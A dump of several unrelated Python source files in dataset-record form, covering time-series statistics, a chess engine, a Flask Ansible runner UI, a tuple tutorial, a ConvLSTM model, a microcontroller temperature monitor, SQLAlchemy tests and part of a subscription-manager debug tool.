\"mean\", \"median\", \"sigmasRatio\", \"intercept\",\r\n \"slope\", \"slopeErr\", \"max\", \"linePValue\", \"numBins\"] ]\\\r\n if self.simpFit \\\r\n else self.compute_tendance_DFs()[ [\"organName\", \"mean\", \"median\", \"sigmasRatio\",\r\n \"slope\", \"slopeErr\", \"max\", \"numBins\", \"intercept\"] ]\r\n\r\n\r\n fit_info[\"citation_rank\"] = range(1, len(fit_info)+1)\r\n\r\n shock_list = self.compute_schock_list(fit_info, medSeuil=self.medSeuil)\r\n fit_info[\"count_shoot\"] = \"No\"\r\n fit_info.loc[ fit_info[\"organName\"].isin(shock_list), \"count_shoot\" ] = \"Yes\"\r\n\r\n fit_info[\"nbinR\"] = (fit_info[\"numBins\"]-1.)/fit_info[\"numBins\"]\r\n fit_info[\"variability\"] = \"\"\r\n fit_info.loc[fit_info[\"sigmasRatio\"]<=1, \"variability\"]=\"Low\"\r\n fit_info.loc[fit_info[\"sigmasRatio\"]<=fit_info[\"nbinR\"], \"variability\"]=\"None\"\r\n fit_info.loc[fit_info[\"sigmasRatio\"]>1, \"variability\"]=\"Moderate\"\r\n fit_info.loc[fit_info[\"sigmasRatio\"]>=2, \"variability\"]=\"high\"\r\n\r\n fit_info[\"tendency\"] = \"Const\"\r\n fit_info.loc[fit_info[\"slope\"]<-1.e-6, \"tendency\"] = \"Decrease\"\r\n fit_info.loc[fit_info[\"slope\"]>1.e-6, \"tendency\"] = \"Increase\"\r\n\r\n #fit_info[\"p_0\"] = round(fit_info[\"linePValue\"], 2)\r\n\r\n def compute_p_0(row) :\r\n p_0 = ndtr(-row[0]/row[1]) if row[0]>0 else 1.- ndtr(-row[0]/row[1])\r\n return p_0\r\n fit_info[\"p_0\"] = fit_info[[\"slope\", \"slopeErr\"]].apply(compute_p_0, axis=1)\r\n fit_info[\"p_0\"] = round(fit_info[\"p_0\"], 2)\r\n fit_info.loc[ (abs(fit_info[\"slope\"])<1.e-6) & (fit_info[\"slopeErr\"].isnull().values.any()), \"p_0\"] = 1.\r\n\r\n self.tendance_info = fit_info[[\"organName\", \"slope\", \"slopeErr\", \"intercept\", \"p_0\"]]\r\n\r\n fit_info.rename(columns={\"mean\": \"mean_citation\"}, inplace=True)\r\n\r\n self._fit_info = fit_info[[\"organName\", \"mean_citation\", \"citation_rank\", \"count_shoot\", \"variability\",\r\n \"tendency\", \"p_0\", \"numBins\"]]\r\n\r\n\r\n def transform(self) :\r\n \"\"\"\r\n :return: dataframe\r\n A dataframe showing the citation rank and tendency of an organisation and whether\r\n the corresponding time serie shows variability and/or shock count.\r\n\r\n \"\"\"\r\n return self._fit_info\r\n\r\n def fit_transform(self, DFs, fileList=None):\r\n \"\"\" Performes fit and transform provided by the TimeSeriesAnalysis class.\r\n :param DFs: list of dataframes\r\n combined time series.\r\n :fileList: list of str, optional\r\n :return: dataframe\r\n \"\"\"\r\n self.fit(DFs, fileList)\r\n return self.transform()\r\n\r\n\r\n def compute_tendance_DFs(self):\r\n \"\"\" Computes the tendency of the time series extracted from input dataframes.\r\n (tendanceModules.py)\r\n\r\n return\r\n ------\r\n The tendency dataframe\r\n \"\"\"\r\n\r\n df_c = self.stackDFs()\r\n statTable = self.compute_stat(df_c, groupKey=self.groupKey, targetCol=self.targetCol,\r\n intp=self.intp, numBins=self.numBins)\r\n df_tendance = self.compute_tendance(df_c, statTable, freq=self.freq, simpFit=self.simpFit)\r\n return df_tendance\r\n\r\n def compute_stat_DFs(self) :\r\n \"\"\" Computes the statistical indicators of the time series extracted from input dataframes.\r\n (statModules.py)\r\n\r\n return\r\n ------\r\n Table of statistics including the variability parameter sigmasRatio.\r\n \"\"\"\r\n df_c = self.stackDFs()\r\n statTable = self.compute_stat(df_c, groupKey=self.groupKey, targetCol=self.targetCol,\r\n intp=self.intp, numBins=self.numBins)\r\n return statTable\r\n\r\n\r\n def get_df(self, DFs):\r\n \"\"\"\r\n :param DFs: list of dataframes\r\n :return: dataframe\r\n cleaned binned dataframe\r\n \"\"\"\r\n self.load_DFs(DFs)\r\n return self.stackDFs()\r\n\r\n\r\n def stackDFs(self):\r\n \"\"\" Stack the binned input dataframes. (dataBinModules.py)\r\n return\r\n ------\r\n The stacked dataframe\r\n \"\"\"\r\n # Filtering the binned dataframes with number of bins > minNumBins\r\n c_dfs = self.extract_cleand_binned_DFs\r\n # Concating all binned dataframes\r\n df_c = stack_c_DFs(c_dfs, memSeuil=self.memSeuil)\r\n return df_c\r\n\r\n\r\n def constrained_tendance_DFs(self):\r\n \"\"\" Computes the constrained tendency with respect to the noiseRatio.\r\n (tendanceModules.py)\r\n\r\n return\r\n ------\r\n The constrained tendency dataframe\r\n \"\"\"\r\n df_tendance = self.compute_tendance_DFs()\r\n return constrained_tendance(df_tendance, noiseRatio=self.noiseRatio, minNumBins=self.minNumBins)\r\n\r\n def compute_schock_list_DFs(self):\r\n \"\"\" Computes the list of organisation containing outliers (shocks) with respect to medSeuil\r\n (statModules.py)\r\n\r\n return\r\n ------\r\n List of organisation names\r\n \"\"\"\r\n statTable = self.compute_stat_DFs()\r\n return self.compute_schock_list(statTable, self.medSeuil)\r\n\r\n def get_most_var_list_DFs(self):\r\n \"\"\" Computes the list of organisation containing most variations in time\r\n (statModules.py)\r\n\r\n return\r\n ------\r\n List of organisation names\r\n \"\"\"\r\n statTable = self.compute_stat_DFs()\r\n return self.get_most_var_list(statTable, minNumBins=self.minNumBins, meanCount=self.meanCount)\r\n\r\n def get_leader_list_DFs(self):\r\n \"\"\" Computes the list of first nLeader organisations.\r\n (statModules.py)\r\n\r\n return\r\n ------\r\n List of organisation names\r\n \"\"\"\r\n statTable = self.compute_stat_DFs()\r\n return self.get_leader_list(statTable, nLeader=self.nLeader)\r\n\r\n","repo_name":"farhangh/TimeSeries","sub_path":"bb8TSA/TSA/tsaModules.py","file_name":"tsaModules.py","file_ext":"py","file_size_in_byte":11418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7685612795","text":"from chessai.model import get_model\nfrom chessai.board_utils import tensor2move, get_position_tensor\nimport chess\nimport numpy as np\n\nclass Engine:\n def __init__(self, path):\n self.model = get_model()\n self.model.initialize()\n self.model.load_params(path)\n self.board = None\n \n def position(self, board):\n self.board = board\n \n def go(self, movetime):\n feture_tensor = get_position_tensor(self.board, white=self.board.turn)\n ohe = np.expand_dims(feature_tensor, axis=0)\n move_tensor = self.model.predict(ohe)[0]\n move = chess.Move.from_uci(tensor2move(move_tensor, white=self.board.turn))\n\n while move not in self.board.legal_moves:\n y, x, n = np.unravel_index(move_tensor.argmax(), move_tensor.shape)\n move_tensor[y, x, n] = 0\n move = chess.Move.from_uci(tensor2move(move_tensor, white=self.board.turn))\n \n return [move]\n","repo_name":"zzmtsvv/chessai","sub_path":"chessnet.py","file_name":"chessnet.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37573535599","text":"\"\"\" All flask UI routes/views defined in here. \"\"\"\r\nimport os\r\nimport datetime\r\nfrom datetime import timedelta\r\nimport logging\r\nimport tzlocal\r\n\r\nfrom flask import render_template, flash, redirect, request, url_for, session, Response, stream_with_context, send_from_directory, Blueprint\r\nfrom flask_login import login_user, current_user, logout_user, login_required\r\nfrom flask_ldap3_login.forms import LDAPLoginForm\r\n\r\nfrom app import app, buttons, stream_template, is_safe_url\r\nfrom app.ui.mailer_ui import send_email_ui\r\n# Import Class/DB tables from Models\r\nfrom app.database.models import Runhistory\r\n# This needs to be imported after the database is initialized and table created\r\nfrom app.ui.connect_ssh_ui import test_ssh, run_ssh_ui\r\n\r\nlog = logging.getLogger('app')\r\n#default = Blueprint('default', __name__, template_folder = 'templates/ui')\r\nui_blueprint = Blueprint('ui', __name__, template_folder='templates/ui')\r\n\r\n\r\n# Declare ROUTES\r\n\r\n@ui_blueprint.route('/login', methods=['GET', 'POST'])\r\ndef login():\r\n # Instantiate a LDAPLoginForm which has a validator to check if the user exists in LDAP.\r\n form = LDAPLoginForm(request.form)\r\n if request.method == 'GET':\r\n return render_template('login.html', form=form)\r\n else:\r\n if form.validate_on_submit():\r\n if form.user:\r\n login_user(form.user)\r\n # Successfully logged in, We can now access the saved user object via form.user.\r\n name = str(form.user).split(',')[0][3:]\r\n app.logger.info('%s succesfully logged in!', name) # Log who logged in\r\n next = request.args.get('next')\r\n # is_safe_url from __init__.py should check if the url is safe for redirects.\r\n # See http://flask.pocoo.org/snippets/62/ for an example.\r\n if not is_safe_url(next):\r\n return flask.abort(400)\r\n return redirect(next or url_for('ui.index')) # Send them home\r\n else:\r\n error = True\r\n name = str(form.username.data)\r\n app.logger.warn('Invalid login attempt by user: %s !', name)\r\n return render_template('login.html', form=form, error=error)\r\n else:\r\n name = str(form.username.data)\r\n app.logger.warn('Invalid login attempt by user: %s', name)\r\n return render_template('login.html', form=form)\r\n\r\n@ui_blueprint.route('/', methods=['GET', 'POST'])\r\ndef index():\r\n if not current_user or current_user.is_anonymous:\r\n return redirect(url_for('ui.login'))\r\n # User is logged in so we can load home page in all it's beauty!\r\n return render_template(\"index.html\", buttons=buttons)\r\n\r\n@ui_blueprint.route('/run', methods=['GET', 'POST'])\r\n@login_required\r\ndef run():\r\n # Here we search for passed values from each of the buttons configured in buttons.yml and assign ansible playbooks that correspond to them.\r\n if request.method == 'POST':\r\n id = request.form['pass_value']\r\n cmd = None\r\n for btn in buttons:\r\n if btn['_id'] == id:\r\n cmd = (btn['_cmd'])\r\n if cmd == None:\r\n # How did we get here? This is just in case user calls /run manually\r\n return redirect('/')\r\n\r\n try:\r\n test_ssh(cmd)\r\n except ValueError as e:\r\n app.logger.error('ERROR: %s ', str(e))\r\n flash('{}'.format(str(e)), 'danger')\r\n return redirect(url_for('ui.index'))\r\n else:\r\n tz = datetime.datetime.now(tzlocal.get_localzone())\r\n runlog = os.path.join(\"ansible-ui-runlog-\" + id + \"-\" + datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S-') + (tz.tzname()) + \".log\")\r\n session['runlog'] = runlog\r\n runlog_path = os.path.join(app.config['APP_PATH'], \"logs\", runlog)\r\n app.logger.info('%s executed playbook with id: %s', str(current_user).split(',')[0][3:], id)\r\n app.logger.info('created playbook runlog file %s', runlog)\r\n data = run_ssh_ui(cmd, runlog_path)\r\n return Response(stream_with_context(stream_template('run.html', data=data)), mimetype='text/html')\r\n\r\n@ui_blueprint.route('/download', methods=['GET', 'POST'])\r\n@login_required\r\ndef download():\r\n runlog = session.get('runlog', None)\r\n app.logger.info('%s downloaded runlog file %s', str(current_user).split(',')[0][3:], runlog)\r\n return send_from_directory(directory=os.path.join(app.config['APP_PATH'], \"logs\"), filename=runlog, as_attachment=True)\r\n\r\n@ui_blueprint.route('/email', methods=['GET', 'POST'])\r\n@login_required\r\ndef email():\r\n runlog = session.get('runlog', None)\r\n recipient_email = request.form['emails']\r\n try:\r\n send_email_ui(recipient_email, runlog)\r\n except Exception as e:\r\n app.logger.error('Mail to recipients %s failed because of %s', recipient_email, (str(e)))\r\n flash('Mail failed: {}'.format(str(e)), 'danger')\r\n else:\r\n app.logger.info('%s emailed runlog file %s to recipients : %s', str(current_user).split(',')[0][3:], runlog, recipient_email)\r\n flash('Email sent succesfully', 'info')\r\n finally:\r\n return redirect(url_for('ui.index'))\r\n\r\n@ui_blueprint.route('/logout', methods=['POST', 'GET'])\r\n@login_required\r\ndef logout():\r\n app.logger.info('user %s succesfully logged out!', str(current_user).split(',')[0][3:]) # Log who logged out\r\n logout_user()\r\n flash('You have been logged out.', 'info')\r\n return redirect(url_for('ui.login'))\r\n\r\n@ui_blueprint.route('/runhistory', methods=['GET', 'POST'])\r\n@login_required\r\ndef runhistory():\r\n page = request.args.get('page', 1, type=int)\r\n runhistory = Runhistory.query.order_by(Runhistory.time_started.desc()).paginate(page, app.config['POSTS_PER_PAGE'], False)\r\n next_url = url_for('ui.runhistory', page=runhistory.next_num) \\\r\n if runhistory.has_next else None\r\n prev_url = url_for('ui.runhistory', page=runhistory.prev_num) \\\r\n if runhistory.has_prev else None\r\n return render_template('runhistory.html', runhistory=runhistory.items, next_url=next_url, prev_url=prev_url)\r\n\r\n@ui_blueprint.route('/viewlog/', methods=['GET', 'POST'])\r\n@login_required\r\ndef viewlog(logfile):\r\n file_path = os.path.join(app.config['APP_PATH'], \"logs\", logfile)\r\n text = open(file_path, 'r+')\r\n content = text.read()\r\n text.close()\r\n return render_template('viewlog.html', text=content)\r\n\r\n# Error views\r\n@app.errorhandler(404)\r\ndef error_404(error):\r\n return render_template('error_pages/404.html'), 404\r\n\r\n@app.errorhandler(403)\r\ndef error_403(error):\r\n return render_template('error_pages/403.html'), 403\r\n\r\n@app.errorhandler(500)\r\ndef error_500(error):\r\n app.logger.warning('user %s got 500 page', str(current_user).split(',')[0][3:])\r\n app.logger.warning('error is: %s', error)\r\n return render_template('error_pages/500.html'), 500\r\n","repo_name":"dpilipovic/flansible","sub_path":"app/ui/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6915,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"17574297680","text":"\"\"\"\n元组(tuple):和数组很类似,区别在于:\n1、元组的数据不能修改(类似于java枚举)\n2、定义的时候用() 而列表用[]\n例子:\ninfo_tuple = (\"ZhangSan\", 18, 1.75)\n\n使用场景:\n1、 函数的 参数 或 返回值,可任意传入和返回多个数据\n2、格式化字符串\n3、让列表不可以修改,类似枚举\n\"\"\"\n\n\ndef tuple_test(test):\n if not test:\n return\n info_tuple = (\"ZhangSan\", 18, 1.75)\n print(type(info_tuple))\n print(info_tuple[2])\n # 空元组\n empty_tuple = ()\n print(type(empty_tuple))\n # 单元组\n single_tuple = (5,) # 定义成(5) 则解释器认为整型了\n\n # index 18第一次出现的索引\n index = info_tuple.index(18)\n # 统计出现的次数\n number = info_tuple.count(1.75)\n print(\"18出现的索引值为: %d\" % index)\n print(number)\n # 遍历\n for tuple_member in info_tuple:\n print(tuple_member)\n\n # 格式化字符串,后面的\"( )\" 本质上就是元组\n print(\"%s 年龄是 %d 身高是 %.2f\" % (\"ZhangSan\", 18, 1.75))\n print(\"%s 年龄是 %d 身高是 %.2f\" % info_tuple)\n\n\ntuple_test(False)\n\n\ndef list_tuple_convert(test):\n if not test:\n return\n num_list = [1, 2, 3, 4]\n\n # list to tuple 数据能修改变为不可修改,保护数据\n num_tuple = tuple(num_list)\n print(type(num_tuple))\n\n # tuple to list 数据从不能修改表为能\n num_list2 = list(num_tuple)\n print(type(num_list2))\n\n\nlist_tuple_convert(False)\n","repo_name":"hurtnotbad/pythonStudy","sub_path":"studyNotes/grammar/tuple-test.py","file_name":"tuple-test.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18232922659","text":"# ------------------------------------------------------------------------------\n# --coding='utf-8'--\n# Written by czifan (czifan@pku.edu.cn)\n# ------------------------------------------------------------------------------\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport torch\nimport torch.nn as nn\n\nclass ConvLSTMBlock(nn.Module):\n def __init__(self, in_channels, num_features, kernel_size=3, padding=1, stride=1):\n super().__init__()\n self.num_features = num_features\n self.conv = self._make_layer(in_channels+num_features, num_features*4,\n kernel_size, padding, stride)\n\n def _make_layer(self, in_channels, out_channels, kernel_size, padding, stride):\n return nn.Sequential(\n nn.Conv2d(in_channels, out_channels,\n kernel_size=kernel_size, padding=padding, stride=stride, bias=False),\n nn.BatchNorm2d(out_channels))\n\n def forward(self, inputs):\n '''\n\n :param inputs: (B, S, C, H, W)\n :param hidden_state: (hx: (B, S, C, H, W), cx: (B, S, C, H, W))\n :return:\n '''\n outputs = []\n B, S, C, H, W = inputs.shape\n hx = torch.zeros(B, self.num_features, H, W).to(inputs.device)\n cx = torch.zeros(B, self.num_features, H, W).to(inputs.device)\n for t in range(S):\n combined = torch.cat([inputs[:, t], # (B, C, H, W)\n hx], dim=1)\n gates = self.conv(combined)\n ingate, forgetgate, cellgate, outgate = torch.split(gates, self.num_features, dim=1)\n ingate = torch.sigmoid(ingate)\n forgetgate = torch.sigmoid(forgetgate)\n outgate = torch.sigmoid(outgate)\n\n cy = (forgetgate * cx) + (ingate * cellgate)\n hy = outgate * torch.tanh(cy)\n outputs.append(hy)\n hx = hy\n cx = cy\n\n return torch.stack(outputs).permute(1, 0, 2, 3, 4).contiguous() # (S, B, C, H, W) -> (B, S, C, H, W)\n\nclass Encoder(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.layers = []\n for idx, params in enumerate(config.encoder):\n setattr(self, params[0]+'_'+str(idx), self._make_layer(*params))\n self.layers.append(params[0]+'_'+str(idx))\n\n def _make_layer(self, type, activation, in_ch, out_ch, kernel_size, padding, stride):\n layers = []\n if type == 'conv':\n layers.append(nn.Conv2d(in_ch, out_ch, kernel_size=kernel_size, padding=padding, stride=stride, bias=False))\n layers.append(nn.BatchNorm2d(out_ch))\n if activation == 'leaky': layers.append(nn.LeakyReLU(inplace=True))\n elif activation == 'relu': layers.append(nn.ReLU(inplace=True))\n elif type == 'convlstm':\n layers.append(ConvLSTMBlock(in_ch, out_ch, kernel_size=kernel_size, padding=padding, stride=stride))\n return nn.Sequential(*layers)\n\n def forward(self, x):\n '''\n :param x: (B, S, C, H, W)\n :return:\n '''\n outputs = [x]\n for layer in self.layers:\n if 'conv_' in layer:\n B, S, C, H, W = x.shape\n x = x.view(B*S, C, H, W)\n x = getattr(self, layer)(x)\n if 'conv_' in layer: x = x.view(B, S, x.shape[1], x.shape[2], x.shape[3])\n if 'convlstm' in layer: outputs.append(x)\n return outputs\n\nclass Decoder(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.layers = []\n for idx, params in enumerate(config.decoder):\n setattr(self, params[0]+'_'+str(idx), self._make_layer(*params))\n self.layers.append(params[0]+'_'+str(idx))\n\n def _make_layer(self, type, activation, in_ch, out_ch, kernel_size, padding, stride):\n layers = []\n if type == 'conv':\n layers.append(nn.Conv2d(in_ch, out_ch, kernel_size=kernel_size, padding=padding, stride=stride, bias=False))\n layers.append(nn.BatchNorm2d(out_ch))\n if activation == 'leaky': layers.append(nn.LeakyReLU(inplace=True))\n elif activation == 'relu': layers.append(nn.ReLU(inplace=True))\n elif activation == 'sigmoid': layers.append(nn.Sigmoid())\n elif type == 'convlstm':\n layers.append(ConvLSTMBlock(in_ch, out_ch, kernel_size=kernel_size, padding=padding, stride=stride))\n elif type == 'deconv':\n layers.append(nn.ConvTranspose2d(in_ch, out_ch, kernel_size=kernel_size, padding=padding, stride=stride, bias=False))\n layers.append(nn.BatchNorm2d(out_ch))\n if activation == 'leaky': layers.append(nn.LeakyReLU(inplace=True))\n elif activation == 'relu': layers.append(nn.ReLU(inplace=True))\n return nn.Sequential(*layers)\n\n def forward(self, encoder_outputs):\n '''\n :param x: (B, S, C, H, W)\n :return:\n '''\n idx = len(encoder_outputs)-1\n for layer in self.layers:\n if 'conv_' in layer or 'deconv_' in layer:\n x = encoder_outputs[idx]\n B, S, C, H, W = x.shape\n x = x.view(B*S, C, H, W)\n x = getattr(self, layer)(x)\n x = x.view(B, S, x.shape[1], x.shape[2], x.shape[3])\n elif 'convlstm' in layer:\n idx -= 1\n x = torch.cat([encoder_outputs[idx], x], dim=2)\n x = getattr(self, layer)(x)\n encoder_outputs[idx] = x\n return x\n\nclass ConvLSTM(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.encoder = Encoder(config)\n self.decoder = Decoder(config)\n\n def forward(self, x):\n x = self.encoder(x)\n x = self.decoder(x)\n return x\n\nif __name__ == '__main__':\n from thop import profile\n from configs.config_3x3_16_3x3_32_3x3_64 import config\n model = ConvLSTM(config)\n flops, params = profile(model, inputs=(torch.Tensor(4, 10, 1, 64, 64),))\n print(flops / 1e9, params / 1e6)\n\n","repo_name":"czifan/ConvLSTM.pytorch","sub_path":"networks/ConvLSTM.py","file_name":"ConvLSTM.py","file_ext":"py","file_size_in_byte":6115,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"18"} +{"seq_id":"32436999601","text":"\"\"\"Temperature monitor\"\"\"\n\nimport machine\nimport utime\n\nsensor_temp = machine.ADC(4)\n\nCONVERSION_FACTOR = 3.3 / (65535)\n\n#file = open(\"temps.txt\", \"w\")\n\nled_red = machine.Pin(15, machine.Pin.OUT)\nled_green = machine.Pin(14, machine.Pin.OUT)\n\nled_onboard = machine.Pin(25, machine.Pin.OUT)\n\n\ndef leds_off():\n led_onboard.value(0)\n led_green.value(0)\n led_red.value(0)\n\ndef leds_on():\n led_onboard.value(1)\n led_green.value(1)\n led_red.value(1)\n\ndef blink():\n leds_off()\n leds_on()\n utime.sleep(.5)\n leds_off()\n utime.sleep(.5)\n leds_on()\n utime.sleep(.5)\n leds_off()\n\nwhile True:\n reading = sensor_temp.read_u16() * CONVERSION_FACTOR\n temperature = 27 - (reading - 0.706)/0.001721\n\n if temperature <= 29.0:\n leds_off()\n led_green.value(1)\n elif temperature > 29.0:\n leds_off()\n led_red.value(1)\n else:\n leds_on()\n\n print(temperature)\n #file.write(str(temperature))\n #file.flush()\n utime.sleep(5)\n\n","repo_name":"javed0863/RP2040","sub_path":"temperature.py","file_name":"temperature.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"43643189809","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\n@author: leason\n@time: 2017/10/19 17:12\n\"\"\"\nimport pytest\nfrom ..test import session, ModelBase, db\nfrom ..test import SingleQuery, MultiQuery, SingleInsert, SingleModify, DeleteOne, DeleteSome, QueryOne\nfrom ..test import News, Tag, Type\n\n\n# content of test_class.py\nclass TestClass:\n\n def setup(self):\n \"\"\"\n 初始化数据库\n :return:\n \"\"\"\n\n ModelBase.metadata.create_all(bind=db)\n\n # tag表数据\n tag_add = {\n \"tag_name\": \"123\"\n }\n SingleInsert(tag_add).add_method(session, Tag)\n\n # type表数据\n type_add = {\n \"type_name\": \"123\"\n }\n SingleInsert(type_add).add_method(session, Type)\n\n # news表数据\n item_add = {\n \"name\": 'leason',\n \"des\": 123456,\n \"type_id\": 1,\n \"tag_id\": 1\n }\n SingleInsert(item_add).add_method(session, News)\n\n def teardown(self):\n \"\"\"\n 清空数据库\n :return:\n \"\"\"\n ModelBase.metadata.drop_all(bind=db)\n\n def test_add(self):\n \"\"\"\n 添加方法test\n :return:\n \"\"\"\n item_add = {\n \"name\": 'leason',\n \"des\": 123456\n }\n result_add = SingleInsert(item_add).add_method(session, News)\n assert result_add is True\n\n def test_modify(self):\n \"\"\"\n 编辑方法test\n :return:\n \"\"\"\n data = {\n \"primary_key\": {\n \"id\": 1\n },\n \"items\": {\n \"name\": \"llx\",\n \"des\": 845\n }\n }\n result_modify = SingleModify(data['primary_key'], data['items']).modify_method(session, News)\n assert result_modify is True\n\n def test_single_query(self):\n \"\"\"\n 单表查询test\n :return:\n \"\"\"\n cond = {\n \"name\": \"\",\n \"des\": \"\",\n \"create_time\": {\n \"start_time\": \"2017-09-19 11:01:21\",\n \"end_time\": \"2017-12-26 11:01:22\"\n }\n }\n state, sql_total, result = SingleQuery(cond=cond).query_method(session, News)\n assert state is True\n assert sql_total is 1\n\n def test_multi_query(self):\n \"\"\"\n 多表查询有外键test\n :return:\n \"\"\"\n cond = {\n \"name\": \"\",\n \"des\": \"\",\n \"create_time\": {\n \"start_time\": \"2017-09-19 11:01:21\",\n \"end_time\": \"2017-12-26 11:01:22\"\n }\n }\n response = {\n \"news\": [],\n \"tag\": [],\n \"type\": []\n }\n state, sql_total, result = MultiQuery(cond=cond, response=response).query_method(session, News, Tag, Type)\n assert state is True\n assert sql_total is 1\n\n def test_delete(self):\n \"\"\"\n 删除方法test\n :return:\n \"\"\"\n item_delete = {\n \"id\": 1\n }\n result_delete = DeleteOne(item_delete).delete_method(session, News)\n assert result_delete is True\n\n def test_delete_some(self):\n \"\"\"\n 批量删除方法test\n :return:\n \"\"\"\n item_delete = {\n \"id\": [1]\n }\n result_delete = DeleteSome(item_delete).delete_method(session, News)\n assert result_delete is True\n\nif __name__ == '__main__':\n pytest.main()\n","repo_name":"silade/OrmCommand","sub_path":"app/test/TestCase.py","file_name":"TestCase.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"42128953934","text":"import errno\nimport argparse\nimport os\nimport sys\nimport shutil\nimport logging\nimport tarfile\nfrom datetime import datetime\nfrom shutil import ignore_patterns\n\nimport subscription_manager.injection as inj\nfrom subscription_manager.cli_command.cli import CliCommand, handle_exception\nfrom subscription_manager.cli import InvalidCLIOptionError, system_exit\nfrom subscription_manager.certdirectory import DEFAULT_PRODUCT_CERT_DIR\nfrom rhsm import ourjson as json\nfrom rhsm.config import get_config_parser\nfrom rhsmlib.services import config\n\nfrom subscription_manager.i18n import ugettext as _\n\nlog = logging.getLogger(\"rhsm-app.\" + __name__)\n\nconf = config.Config(get_config_parser())\n\nERR_NOT_REGISTERED_MSG = _(\n \"This system is not yet registered. Try 'subscription-manager register --help' for more information.\"\n)\nERR_NOT_REGISTERED_CODE = 1\n\nASSEMBLE_DIR = \"/var/spool/rhsm/debug\"\nROOT_READ_ONLY_DIR = 0o700\nROOT_READ_ONLY_FILE = 0o600\nKEY_IGNORE_PATS = [\"*key.pem\"]\n\n\nclass SystemCommand(CliCommand):\n def __init__(\n self,\n name=\"system\",\n shortdesc=_(\"Assemble system information as a tar file or directory\"),\n primary=True,\n ):\n CliCommand.__init__(self, name=name, shortdesc=shortdesc, primary=primary)\n\n self.parser.add_argument(\n \"--destination\",\n dest=\"destination\",\n default=\"/tmp\",\n help=_(\"the destination location of the result; default is /tmp\"),\n )\n # default is to build an archive, this skips the archive and clean up,\n # just leaving the directory of debug info for sosreport to report\n self.parser.add_argument(\n \"--no-archive\",\n action=\"store_false\",\n default=True,\n dest=\"archive\",\n help=_(\"data will be in an uncompressed directory\"),\n )\n self.parser.add_argument(\n \"--sos\",\n action=\"store_true\",\n default=False,\n dest=\"sos\",\n help=_(\"only data not already included in sos report will be collected\"),\n )\n # These options don't do anything anymore, since current versions of\n # RHSM api doesn't support it, and previously they failed silently.\n # So now they are hidden, and they are not hooked up to anything. This\n # avoids breaking existing scripts, since it also didn't do anything\n # before. See rhbz #1246680\n self.parser.add_argument(\n \"--no-subscriptions\",\n action=\"store_true\",\n dest=\"placeholder_for_subscriptions_option\",\n default=False,\n help=argparse.SUPPRESS,\n )\n self.parser.add_argument(\n \"--subscriptions\",\n action=\"store_true\",\n dest=\"placeholder_for_subscriptions_option\",\n default=False,\n help=argparse.SUPPRESS,\n )\n\n self.assemble_path = ASSEMBLE_DIR\n\n # so we can track the path of the archive for tests.\n self.final_destination_path = None\n\n def _get_usage(self):\n return _(\"%(prog)s {name} [OPTIONS] \").format(name=self.name)\n\n def _validate_options(self):\n if self.options.destination and not os.path.exists(self.options.destination):\n raise InvalidCLIOptionError(_(\"The directory specified by '--destination' must already exist.\"))\n # no archive, check if we can safely copy to dest.\n if not self.options.archive:\n if not self._dirs_on_same_device(self.assemble_path, self.options.destination):\n msg = _(\n \"To use the no-archive option, the destination directory '{destination}' \"\n \"must exist on the same file system as the \"\n \"data assembly directory '{assembly}'.\"\n ).format(destination=self.options.destination, assembly=self.assemble_path)\n raise InvalidCLIOptionError(msg)\n # In case folks are using this in a script\n if self.options.placeholder_for_subscriptions_option:\n log.debug(\"The rhsm-debug options '--subscriptions' and '--no-subscriptions' have no effect now.\")\n\n def _dirs_on_same_device(self, dir1, dir2):\n return os.stat(dir1).st_dev == os.stat(dir2).st_dev\n\n def _do_command(self):\n self.options.destination = os.path.expanduser(self.options.destination)\n self._validate_options()\n consumer = inj.require(inj.IDENTITY)\n if not consumer.is_valid():\n system_exit(ERR_NOT_REGISTERED_CODE, ERR_NOT_REGISTERED_MSG)\n\n code = self._make_code()\n archive_name = \"rhsm-debug-system-%s\" % code\n tar_file_name = \"%s.tar.gz\" % archive_name\n # /var/spool/rhsm/debug/rhsm-debug-system-20131212-121234/\n content_path = os.path.join(self.assemble_path, archive_name)\n # /var/spool/rhsm/debug/rhsm-debug-system-20131212-123413.tar.gz\n tar_file_path = os.path.join(self.assemble_path, tar_file_name)\n\n try:\n # assemble path is in the package, so should always exist\n self._makedir(content_path)\n\n owner = self.cp.getOwner(consumer.uuid)\n\n self._write_flat_file(content_path, \"consumer.json\", self.cp.getConsumer(consumer.uuid))\n self._write_flat_file(content_path, \"compliance.json\", self.cp.getCompliance(consumer.uuid))\n self._write_flat_file(\n content_path, \"entitlements.json\", self.cp.getEntitlementList(consumer.uuid)\n )\n self._write_flat_file(\n content_path, \"pools.json\", self.cp.getPoolsList(consumer.uuid, True, None, owner[\"key\"])\n )\n self._write_flat_file(content_path, \"version.json\", self._get_version_info())\n\n # FIXME: we need to anon proxy passwords?\n sos = self.options.sos\n defaults = conf.defaults()\n # sosreport collects /etc/rhsm/* and /var/*/rhsm/*, so these would\n # be redundant for sos\n if not sos:\n # copy rhsm.conf specifically\n self._copy_cert_directory(\"/etc/rhsm\", content_path)\n self._copy_directory(\"/var/log/rhsm\", content_path)\n self._copy_directory(\"/var/lib/rhsm\", content_path)\n\n if not sos:\n self._copy_cert_directory(DEFAULT_PRODUCT_CERT_DIR, content_path)\n\n if defaults[\"productcertdir\"] != conf[\"rhsm\"][\"productCertDir\"] or not sos:\n 